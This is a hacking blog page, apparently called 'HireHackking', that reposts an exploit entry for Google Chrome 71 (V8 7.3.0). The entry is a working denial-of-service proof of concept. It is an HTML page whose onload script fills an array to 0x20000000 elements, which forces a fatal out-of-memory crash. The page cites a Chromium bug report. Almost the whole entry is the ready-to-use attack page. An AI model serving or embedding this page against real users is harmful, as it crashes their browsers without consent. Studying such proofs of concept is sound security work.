Jump to content
  • Entries

    16114
  • Comments

    7952
  • Views

    863550863

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

<!--
# Exploit Title: Google Chrome 71.0.3578.98 V8 JavaScript Engine - Out-of-memory in invalid array length. Denial of Service (PoC)
# Google Dork: N/A
# Date: 2019-01-10
# Exploit Author: Bogdan Kurinnoy (b.kurinnoy@gmail.com)
# Vendor Homepage: https://www.google.com/
# Version: Google Chrome 71.0.3578.98, V8 version 7.3.0 (candidate)
# Tested on: Windows x64
# CVE : N/A

# Description:

# Fatal javascript OOM in invalid array length

# https://bugs.chromium.org/p/v8/issues/detail?id=8668
-->


<html>
<head>
<script>

function main() {

var ar = [];

	for(let i = 0; i < 0x20000000; ++i){
		ar[i]=i;
	} 
}
</script>
</head>
<body onload=main()></body>
</html>